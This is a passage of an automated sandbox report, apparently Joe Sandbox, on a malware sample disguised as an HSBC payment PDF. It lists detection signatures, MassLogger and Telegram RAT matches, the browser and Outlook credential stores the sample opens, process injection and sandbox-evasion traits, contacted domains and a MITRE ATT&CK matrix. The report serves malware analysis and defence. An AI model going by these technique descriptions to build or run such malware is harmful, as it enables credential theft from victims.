              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
              Source: SensorDataService.exe, 00000012.00000003.1461972151.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1462082089.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495410432.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495620937.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000002.2602829063.00000000005E6000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495285221.00000000005E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
              Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-180293
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-180644
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D64560 LdrInitializeThunk,LdrInitializeThunk,5_2_05D64560
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00535FF8 mov eax, dword ptr fs:[00000030h]0_2_00535FF8
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00AC1158 mov eax, dword ptr fs:[00000030h]0_2_00AC1158
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00AC27D8 mov eax, dword ptr fs:[00000030h]0_2_00AC27D8
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00AC2778 mov eax, dword ptr fs:[00000030h]0_2_00AC2778
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F11130 mov eax, dword ptr fs:[00000030h]0_2_02F11130
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F534CD mov eax, dword ptr fs:[00000030h]0_2_02F534CD
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_00981130 mov eax, dword ptr fs:[00000030h]16_2_00981130
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009C34CD mov eax, dword ptr fs:[00000030h]16_2_009C34CD
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F5420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02F5420B
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F508F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02F508F1
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009C08F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_009C08F1
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009C420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_009C420B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtOpenKeyEx: Indirect: 0x140077B9BJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtQueryValueKey: Indirect: 0x140077C9FJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeNtClose: Indirect: 0x140077E81
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 779008Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8584.tmp VolumeInformationJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8595.tmp VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_81
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_XP
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_XPe
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_VISTA
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_7
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: WIN_8
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected MassLogger RAT
              Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1347642495.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2636185001.000000000289B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2590084027.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 3232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2724, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		33
              Native API              		1
              LSASS Driver              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		12
              System Time Discovery              		1
              Taint Shared Content              		11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		11
              Deobfuscate/Decode Files or Information              		121
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts              		1
              LSASS Driver              		1
              Abuse Elevation Control Mechanism              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		4
              Obfuscated Files or Information              		NTDS327
              System Information Discovery              		Distributed Component Object Model121
              Input Capture              		3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
              Valid Accounts              		2
              Software Packing              		LSA Secrets331
              Security Software Discovery              		SSH3
              Clipboard Data              		14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
              Access Token Manipulation              		1
              Timestomp              		Cached Domain Credentials21
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items212
              Process Injection              		1
              DLL Side-Loading              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
              Masquerading              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Valid Accounts              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
              Virtualization/Sandbox Evasion              		Network Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Access Token Manipulation              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task212
              Process Injection              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572492 Sample: HSBC Payment Notification S... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 23 other IPs or domains 2->40 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 66 17 other signatures 2->66 7 armsvc.exe 1 2->7         started        12 HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe 5 2->12         started        14 elevation_service.exe 2->14         started        16 15 other processes 2->16 signatures3 62 Tries to detect the country of the analysis system (by using the IP) 36->62 64 Uses the Telegram API (likely for C&C communication) 38->64 process4 dnsIp5 48 ww99.fwiwk.biz 72.52.179.174, 49741, 49995, 80 LIQUIDWEBUS United States 7->48 50 lpuegx.biz 82.112.184.197, 49763, 49815, 49872 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 7->50 54 7 other IPs or domains 7->54 22 C:\Windows\System32\wbengine.exe, PE32+ 7->22 dropped 24 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 7->24 dropped 26 C:\Windows\System32\vds.exe, PE32+ 7->26 dropped 34 146 other malicious files 7->34 dropped 72 Drops executable to a common third party application directory 7->72 74 Infects executable files (exe, dll, sys, html) 7->74 52 cvgrf.biz 54.244.188.177, 49701, 49702, 49716 AMAZON-02US United States 12->52 28 C:\Windows\System32\alg.exe, PE32+ 12->28 dropped 30 C:\Windows\System32\AppVClient.exe, PE32+ 12->30 dropped 32 C:\Program Files (x86)\...\armsvc.exe, PE32 12->32 dropped 76 Binary is likely a compiled AutoIt script file 12->76 78 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->78 80 Writes to foreign memory regions 12->80 82 Maps a DLL or memory area into another process 12->82 18 RegSvcs.exe 15 2 12->18         started        84 Found direct / indirect Syscall (likely to bypass EDR) 14->84 86 Creates files inside the volume driver (system volume information) 16->86 88 Contains functionality to behave differently if execute on a Russian/Kazak computer 16->88 file6 signatures7 process8 dnsIp9 42 api.telegram.org 149.154.167.220, 443, 49736 TELEGRAMRU United Kingdom 18->42 44 checkip.dyndns.com 193.122.6.168, 49708, 80 ORACLE-BMC-31898US United States 18->44 46 reallyfreegeoip.org 104.21.67.152, 443, 49715 CLOUDFLARENETUS United States 18->46 68 Tries to steal Mail credentials (via file / registry access) 18->68 70 Tries to harvest and steal browser information (history, passwords, etc) 18->70 signatures10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe79%ReversingLabsWin32.Virus.Expiro
              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe100%AviraW32/Infector.Gen
              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
